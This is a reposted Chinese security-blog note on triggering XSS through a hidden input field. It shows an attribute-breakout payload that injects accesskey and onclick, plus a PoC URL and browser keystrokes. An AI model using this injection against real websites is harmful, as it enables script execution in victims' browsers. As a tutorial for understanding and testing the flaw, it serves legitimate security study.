安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > Hidden属性的input标签中XSS的触发方法

Hidden属性的input标签中XSS的触发方法

时间:2018-01-10来源:未知 作者:安云网点击:
今天看到一个XSS漏洞,插入点在一个有 hidden 属性的 input 标签,大致情况如下: inputtype=hiddenname=returnurlvalue=[USERINJECT]/1 正常情况下的XSS应当是: http://victim/?value= ” onclick=”alert(document.domain) 但是这里由于该 input 未在页面中显示,

今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:

//本文来自安云网

<input type="hidden" name="returnurl" value="[USER INJECT]" />1 //内容来自AnYun.ORG 

正常情况下的XSS应当是: //内容来自AnYun.ORG

http://victim/?value=” onclick=”alert(document.domain) //本文来自安云网

但是这里由于该input 未在页面中显示,常用的onclick 方法无法使用(点不到这个标签怎么触发onclick…),不过在浏览器中还有一个好玩的属性叫accesskey 于是乎构造: //内容来自AnYun.ORG

<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />1 
//内容来自安云网

PoC为:

//本文来自安云网

http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain) //内容来自安云网

触发方法不同的浏览器不同,下面是w3school的总结: 
 Hidden属性的input标签中XSS的触发方法 
所以上面的XSS触发方法为: 
FF下:shift+alt+X (测试成功) 
Chrome:alt+X (最新版Chrome未测试成功) 
IE下:alt+X (未测试成功)

//内容来自AnYun.ORG

    from

    //内容来自安云网

    http://blog.csdn.net/change518/article/details/51024706 //本文来自安云网

    顶一下
    (0)
    0%
    踩一下
    (0)
    0%
    ------分隔线----------------------------
    发表评论
    请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
    评价:
    验证码: 点击我更换图片
    相关内容
    推荐内容